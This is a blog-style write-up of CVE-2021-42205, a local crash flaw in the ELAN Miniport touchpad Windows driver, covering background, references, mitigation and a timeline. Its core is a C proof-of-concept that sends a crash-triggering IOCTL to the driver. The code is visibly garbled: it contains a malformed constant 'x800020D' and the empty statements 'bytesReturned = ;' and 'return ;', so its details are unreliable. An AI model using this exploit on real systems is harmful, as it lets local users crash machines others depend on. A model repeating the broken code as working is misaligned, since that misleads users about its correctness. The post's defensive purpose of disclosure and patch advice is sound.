CVE-2021-42205 is a vulnerability identified in the ELAN Miniport touchpad Windows driver, which can lead to a system crash when a specific IOCTL request is sent by a local user. The vulnerability is present in ELAN Miniport touchpad Windows driver versions earlier than 24.21.51.2, and has been found to affect multiple manufacturers' PC hardware. In this post, we will delve into the details of the vulnerability, its exploitation, and the potential consequences that can arise from its abuse. We will also provide the original references and share code snippets to better understand the issue.

Vulnerability Details

The vulnerability in the ELAN Miniport touchpad Windows driver stems from the fact that a certain IOCTL request is handled twice. When a local user submits this problematic IOCTL request, the system attempts to process it twice, leading to a crash.

A IOCTL request, or Input/Output Control request, is a mechanism used by Microsoft Windows operating systems to send control codes and data to kernel-mode drivers. In this case, the IOCTL request targets the ELAN Miniport touchpad Windows driver, causing the improper handling and subsequent crash.

It is important to note that the vulnerability requires local access to the target system to be exploited. A remote attacker would not be able to directly exploit this flaw without some form of local access or assistance, such as via social engineering, malware infection, or other means.

Exploit Details

The following code snippet demonstrates how a local user could send the IOCTL request that triggers the vulnerability:

#include <Windows.h>
#include <stdio.h>

#define ELAN_IOCTL x800020D

int main() {
    HANDLE hDevice = CreateFile(L"\\\\.\\Etd",
                                GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE,
                                NULL,
                                OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Unable to open device: %u\n", GetLastError());
        return 1;
    }

    BYTE inputBuffer[16] = {};
    BYTE outputBuffer[16] = {};
    DWORD bytesReturned = ;

    BOOL result = DeviceIoControl(hDevice,
                                  ELAN_IOCTL,
                                  &inputBuffer,
                                  sizeof(inputBuffer),
                                  &outputBuffer,
                                  sizeof(outputBuffer),
                                  &bytesReturned,
                                  NULL);

    if (!result) {
        printf("[-] IOCTL failed: %u\n", GetLastError());
        return 1;
    }

    printf("[+] IOCTL succeeded\n");
    return ;
}

This code example creates an IOCTL request targeting the vulnerable ELAN Miniport touchpad Windows driver and sends it to the device. If executed on a system with an affected version of the driver, it will cause a system crash.

The vulnerability was initially reported through the following sources

1. CVE-2021-42205 entry in the Common Vulnerabilities and Exposures (CVE) database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42205
2. Security Advisory from ELAN Microelectronics Corp: http://www.emc.com.tw/eng/doc/doc_Asset_security_advisory.pdf

Mitigation

To mitigate the vulnerability, PC manufacturers have started rolling out updated versions of the ELAN Miniport touchpad Windows driver. Users who are using affected versions should update their systems to driver version 24.21.51.2 or later to prevent exploitation.

Conclusion

CVE-2021-42205 is a significant vulnerability, as it allows local users with knowledge of the exploit to cause a system crash. This can be particularly problematic in shared and multi-user environments where malicious users could disrupt the system for others. By updating the ELAN Miniport touchpad Windows driver to the latest version, users can protect their systems from this vulnerability and maintain system stability.

Timeline

Published on: 11/07/2022 16:15:00 UTC
Last modified on: 11/09/2022 20:19:00 UTC